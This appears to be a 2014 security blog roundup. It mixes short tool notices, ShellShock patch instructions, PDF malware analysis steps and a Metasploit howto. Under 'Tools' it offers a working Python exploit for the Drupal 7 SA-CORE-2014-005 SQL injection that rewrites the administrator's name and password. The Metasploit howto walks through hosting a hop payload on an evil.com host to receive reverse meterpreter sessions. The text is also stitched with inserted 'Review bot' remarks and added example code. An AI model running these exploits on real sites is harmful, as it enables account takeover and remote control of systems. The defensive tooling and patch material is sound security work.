CVE Feeds

Oct 21, 2014

Tools: FindBugs + FindSecurityBugs - Java security static analysis tools

FindBugs

FindBugs is a program which uses static analysis to look for bugs in Java code. It is free software, distributed under the terms of the Lesser GNU Public License. The name FindBugs™ and the FindBugs logo are trademarked by The University of Maryland. FindBugs has been downloaded more than a million times.

Source: http://findbugs.sourceforge.net/

FindSecurityBugs
For those who don't know about it, FindSecurityBugs is a plugin for the Java static analysis tool FindBugs. This plugin consists of a set of rules that focus only on security weaknesses.

Source: http://blog.h3xstream.com/2014/10/find-security-bugs-new-version-and.html


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: RIPS (Static Source Code Analysis For PHP Vulnerabilities)

RIPS is a tool written in PHP to find vulnerabilities in PHP web applications using static source code analysis. By tokenizing and parsing all source code files, RIPS is able to transform PHP source code into a program model and to detect sensitive sinks (potentially vulnerable functions) that can be tainted by user input (influenced by a malicious user) during the program flow. Besides the structured output of found vulnerabilities, RIPS also offers an integrated code audit framework for further manual analysis.

Source: http://rips-scanner.sourceforge.net/
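As an added illustration of the source-to-sink taint model described above (example code written for this page, not part of RIPS), here is a deliberately small line-based tracker run over a constructed PHP snippet; the source, sink and sanitizer lists are assumptions for the toy, and RIPS itself parses full PHP rather than matching lines.

```python
import re

# Sources, sinks and sanitizers assumed for this toy; RIPS' real rule set is far larger.
SOURCES = ("$_GET", "$_POST", "$_COOKIE", "$_REQUEST")
CALL_SINKS = {"mysql_query": "SQL injection", "eval": "code execution",
              "system": "command execution"}
SANITIZERS = ("intval", "mysql_real_escape_string", "htmlspecialchars")
VAR = re.compile(r"\$[A-Za-z_]\w*")
ASSIGN = re.compile(r"^\s*(\$[A-Za-z_]\w*)\s*=\s*(.+?);\s*$")
CALL = re.compile(r"\b(\w+)\s*\((.*)\)")   # outermost call on the line
ECHO = re.compile(r"^\s*echo\s+(.+?);")

def is_tainted(expr, tainted):
    """True if expr reads a source or a tainted variable and is not wrapped in a
    sanitizer. Conservative on purpose: 'x' . intval($_GET[..]) is still flagged."""
    expr = expr.strip()
    if any(expr.startswith(s + "(") for s in SANITIZERS):
        return False
    if any(src in expr for src in SOURCES):
        return True
    return any(v in tainted for v in VAR.findall(expr))

def scan_php(source):
    """Return (line, sink, vulnerability class) for each sink reached by taint."""
    tainted, findings = set(), []
    for lineno, line in enumerate(source.splitlines(), 1):
        m = ASSIGN.match(line)
        var, expr = (m.group(1), m.group(2)) if m else (None, line)
        c = CALL.search(expr)
        if c and c.group(1) in CALL_SINKS and is_tainted(c.group(2), tainted):
            findings.append((lineno, c.group(1), CALL_SINKS[c.group(1)]))
        e = ECHO.match(line)
        if e and is_tainted(e.group(1), tainted):
            findings.append((lineno, "echo", "XSS"))
        if var:  # the program-model step: propagate taint through assignments
            if is_tainted(expr, tainted):
                tainted.add(var)
            else:
                tainted.discard(var)  # a clean reassignment clears taint
    return findings

# Constructed sample: one tainted and one sanitised flow into each sink.
SAMPLE_PHP = """<?php
$id = $_GET['id'];
$safe_id = intval($_GET['id']);
$name = $_POST['name'];
$result = mysql_query("SELECT * FROM users WHERE id = " . $id);
$result2 = mysql_query("SELECT * FROM users WHERE id = " . $safe_id);
echo htmlspecialchars($name);
echo $name;
"""
```

Running `scan_php(SAMPLE_PHP)` reports line 5 (SQL injection via `$id`) and line 8 (XSS via `$name`) and stays quiet on the two sanitised flows.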


Tools: OWASP OWTF(Offensive Web Testing Framework)

OWASP OWTF is a project that aims to make security assessments as efficient as possible by automating the manual, uncreative part of pen testing.

Source: https://owtf.github.io/

Oct 16, 2014

Ruxcon & Breakpoint - Material

https://ruxcon.org.au/slides/

https://ruxconbreakpoint.com/slides/


Tools: Drupal 7.x SQL Injection SA-CORE-2014-005

    #Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
    #Creditz to https://www.reddit.com/user/fyukyuk
    # Python 2 script (urllib2, print statements)
    import urllib2,sys
    from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
    # Check the argument count before indexing argv (the original read argv first,
    # compared the count against 3 instead of 4, and did not exit on a bad count)
    if len(sys.argv) != 4:
        print "usage: host username password"
        print "e.g.   http://nope.io admin wowsecure"
        sys.exit(1)
    host = sys.argv[1]
    user = sys.argv[2]
    password = sys.argv[3]
    # Drupal 7 hash of the chosen password (renamed from 'hash' so the builtin is not shadowed)
    pw_hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
    target = '%s/?q=node&destination=node' % host
    post_data = "name[0%20;update+users+set+name%3d\'" \
                +user \
                +"'+,+pass+%3d+'" \
                +pw_hash[:55] \
                +"'+where+uid+%3d+\'1\';;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"
    content = urllib2.urlopen(url=target, data=post_data).read()
    # The PHP warning in the response is the success indicator the original script relies on
    if "mb_strlen() expects parameter 1" in content:
        print "Success!\nLogin now with user:%s and pass:%s" % (user, password)

Hack In The Box 2014 - Material

http://conference.hitb.org/hitbsecconf2014kul/materials/

Oct 15, 2014

Howto: Fix ShellShock in CentOS 4

First, follow the "Setup" procedure from http://bradthemad.org/tech/notes/patching_rpms.php.
Then run the following commands from your %_topdir:
    wget http://ftp.redhat.com/redhat/linux/updates/enterprise/4ES/en/os/SRPMS/bash-3.0-27.el4.src.rpm
    rpm -ivh bash-3.0-27.el4.src.rpm
    cd SOURCES
    wget http://ftp.gnu.org/gnu/bash/bash-3.0-patches/bash30-017
    cd ..
Patch SPECS/bash.spec with this diff:
4c4
< Release: 27%{?dist}
---
> Release: 27.2%{?dist}
28a29
> Patch17: bash30-017
110c111,112
< #%patch16 -p0 -b .016
---
> %patch16 -p0 -b .016
> %patch17 -p0 -b .017
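Review bot: besides adding `%patch17 -p0 -b .017`, this hunk uncomments `%patch16 -p0 -b .016`, which the stock spec had disabled; make sure a `Patch16:` source line is still declared (the 28a29 hunk only adds `Patch17: bash30-017`), because a `%patch16` with no matching `Patch16:` aborts the %prep stage, and record in the changelog that the rebuild now applies 016 as well, since that is a second behavioural change beyond the ShellShock fix.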
Then finish with these commands:
    rpmbuild -ba SPECS/bash.spec
    sudo rpm -Uvh RPMS/i386/bash-3.0-27.2.i386.rpm
If someone knows an easy way to upload them, I'll put up my source and RPM.
Edit: The latest comments in the Red Hat Bugzilla say the patch is incomplete. The new ID is CVE-2014-7169.
Edit: There are two additional patches from gnu.org, so also download those into the same SOURCES directory:
    wget http://ftp.gnu.org/gnu/bash/bash-3.0-patches/bash30-018
    wget http://ftp.gnu.org/gnu/bash/bash-3.0-patches/bash30-019
Then also edit the SPECS/bash.spec as follows ("Release" numbering optional):
4c4
< Release: 27%{?dist}
---
> Release: 27.2.019%{?dist}
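Review bot: this hunk starts again from `< Release: 27%{?dist}`, so the second diff is written against the pristine spec and replaces the first one rather than stacking on it; on a spec already edited to `Release: 27.2%{?dist}` the `4c4` context will not match, so reapply from a fresh `rpm -ivh` of the source RPM (or hand-edit) and say so in the instructions.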
28a29,31
> Patch17: bash30-017
> Patch18: bash30-018
> Patch19: bash30-019
110c113,116
< #%patch16 -p0 -b .016
---
> %patch16 -p0 -b .016
> %patch17 -p0 -b .017
> %patch18 -p0 -b .018
> %patch19 -p0 -b .019 

Source: http://serverfault.com/questions/631055/how-do-i-patch-rhel-4-for-the-bash-vulnerabilities-in-cve-2014-6271-and-cve-2014
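To confirm that the rebuilt package really closes both CVEs named above, here is an added post-install check (not part of the serverfault answer) that runs the two publicly documented test cases against a bash binary; it assumes the bash under test is on PATH, or that its path is passed in.

```python
import os
import shutil
import subprocess
import tempfile

# Added example: run the two public ShellShock checks against a bash binary
# (assumed on PATH, or pass a path) after 'rpm -Uvh' of the rebuilt package.

def check_cve_2014_6271(bash="bash"):
    """CVE-2014-6271: commands trailing a function body in an env var get run.
    Returns 'vulnerable', 'patched' or 'no-bash'."""
    if shutil.which(bash) is None:
        return "no-bash"
    env = dict(os.environ, x="() { :;}; echo VULNERABLE")
    out = subprocess.run([bash, "-c", "echo test"], env=env,
                         capture_output=True, text=True).stdout
    return "vulnerable" if "VULNERABLE" in out else "patched"

def check_cve_2014_7169(bash="bash"):
    """CVE-2014-7169 (the incomplete-fix follow-up): a parser error leaks a
    redirection into the next command, so 'echo date' writes a file named
    'echo'. Run in a scratch directory so nothing is left behind."""
    if shutil.which(bash) is None:
        return "no-bash"
    env = dict(os.environ, X="() { (a)=>\\")
    with tempfile.TemporaryDirectory() as tmp:
        subprocess.run([bash, "-c", "echo date"], env=env, cwd=tmp,
                       capture_output=True, text=True)
        return "vulnerable" if os.path.exists(os.path.join(tmp, "echo")) else "patched"

def shellshock_status(bash="bash"):
    """Both results keyed by CVE id; anything other than 'patched' needs action."""
    return {"CVE-2014-6271": check_cve_2014_6271(bash),
            "CVE-2014-7169": check_cve_2014_7169(bash)}

if __name__ == "__main__":
    for cve, state in shellshock_status().items():
        print(cve, state)
```

On the CentOS 4 box, point it at the freshly installed binary with `shellshock_status("/bin/bash")`; a result of `vulnerable` for CVE-2014-7169 with `patched` for CVE-2014-6271 is exactly the state the first edit above describes.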

Howto: PDF Analysis in 5 steps


  1. Find and extract JavaScript. One technique is using Didier Stevens' suite of tools to analyze the content of the PDF and look for suspicious elements. One of those tools is pdfid, which can show several keywords used in PDF files that could be used to exploit vulnerabilities.
  2. Deobfuscate JavaScript. The second step is to deobfuscate the JavaScript. JavaScript can contain several layers of obfuscation; in this case there was quite some manual cleanup in the extracted code just to get the code isolated. The object.raw contained 4 JavaScript elements between <script xxxx contentType="application/x-javascript"> tags and 1 image in base64 format in an <image> tag. This JavaScript code between tags needs to be extracted and placed into a separate file. The same can be done for the chunk of base64 data, which when decoded will produce a 67Mb BMP file.
  3. Extract the shellcode. The third step is to extract the shellcode from the deobfuscated JavaScript. In this case the eval.005.log file contained the deobfuscated JavaScript.
  4. Create a shellcode executable. Next, with the shellcode encoded in hexadecimal format we can produce a Windows binary that runs the shellcode. This is achieved using a script called shellcode2exe.py written by Mario Vilas and later tweaked by Anand Sastry. As Lenny states: "The shellcode2exe.py script accepts shellcode encoded as a string or as raw binary data, and produces an executable that can run that shellcode. You load the resulting executable file into a debugger to examine its."
  5. Analyze the shellcode and determine what it does. The final step is to determine what the shellcode does. To analyze the shellcode you could use a disassembler or a debugger. In this case a static analysis of the shellcode using the strings command shows several API calls used by the shellcode. It also shows a URL pointing to an executable that will be downloaded if this shellcode gets executed.
Source: http://countuponsecurity.com/2014/09/22/malicious-documents-pdf-analysis-in-5-steps/
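As an added example for step 1 (written for this page, not Didier Stevens' pdfid), a small keyword counter over raw PDF bytes that also decodes #xx-escaped names, which plain string searches miss; the keyword list and the sample PDF are constructed for the example.

```python
import re
from collections import Counter

# Added example (not Didier Stevens' pdfid): count the action/script keywords
# that make a PDF worth a closer look, decoding #xx-escaped names first.
KEYWORDS = ("/JS", "/JavaScript", "/AA", "/OpenAction", "/Launch",
            "/EmbeddedFile", "/ObjStm", "/AcroForm", "/RichMedia")
NAME = re.compile(rb"/[^\s/<>\[\]{}()%]+")   # a PDF name token: '/' up to a delimiter
HEX_ESC = re.compile(rb"#([0-9A-Fa-f]{2})")

def normalise_name(raw):
    """Decode #xx escapes so b'/J#61vaScript' compares equal to b'/JavaScript'."""
    return HEX_ESC.sub(lambda m: bytes([int(m.group(1), 16)]), raw)

def count_keywords(data):
    """Exact-name counts over the raw bytes; names inside compressed object
    streams are invisible here and need pdf-parser-style inflation first."""
    counts = Counter()
    for m in NAME.finditer(data):
        name = normalise_name(m.group(0)).decode("latin-1")
        if name in KEYWORDS:
            counts[name] += 1
    return counts

def triage(data):
    """Return (counts, reasons); a non-empty reasons list means: go on to step 2."""
    counts = count_keywords(data)
    reasons = []
    if counts["/JS"] or counts["/JavaScript"]:
        reasons.append("contains JavaScript")
    if counts["/OpenAction"] or counts["/AA"]:
        reasons.append("automatic action on open/event")
    if counts["/Launch"]:
        reasons.append("launch action")
    return counts, reasons

# Constructed sample: a catalog whose OpenAction points at a JavaScript action,
# with the action type hidden as /J#61vaScript.
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
    b"3 0 obj << /Type /Action /S /J#61vaScript /JS (app.alert(1)) >> endobj\n"
    b"4 0 obj << /Type /Page /AA << /O 3 0 R >> >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)
if __name__ == "__main__":
    counts, reasons = triage(SAMPLE_PDF)
    print(dict(counts), reasons)
```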

Videos: Brucon 2014

http://files.brucon.org/2014/videos/

Oct 14, 2014

Howto: use the PHP Hop payload of Metasploit

1. The payload is in $(metasploit folder)/data/php/hop.php

2. Copy hop.php to any website that you want

3. In the exploit module, select windows/meterpreter/reverse_hop_http as the payload and set HOPURL to the website you set up in step #2 (in this example: http://www.evil.com/hop.php)

4. Exploit the client; if the exploit succeeds, the client will visit http://www.evil.com/hop.php and send the session to hop.php. After that you will get the meterpreter session :)